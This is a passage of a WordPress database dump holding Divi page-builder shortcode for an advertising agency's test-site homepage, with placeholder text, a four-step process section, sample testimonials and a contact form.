column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-Copy-12.png\" alt=\"digital advertising\" title_text=\"digital advertising\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-07-1.png\" title_text=\"home-office-07-1\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-05 07:28:38','2020-08-05 07:28:38','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/05/134-revision-v1/',0,'revision','',0),(427,1,'2020-08-05 07:38:22','2020-08-05 07:38:22','creative advertising agency','Why we','','inherit','open','closed','','why-we','','','2020-08-07 16:38:31','2020-08-07 16:38:31','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png',0,'attachment','image/png',0),(428,1,'2020-08-05 07:38:55','2020-08-05 07:38:55','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" 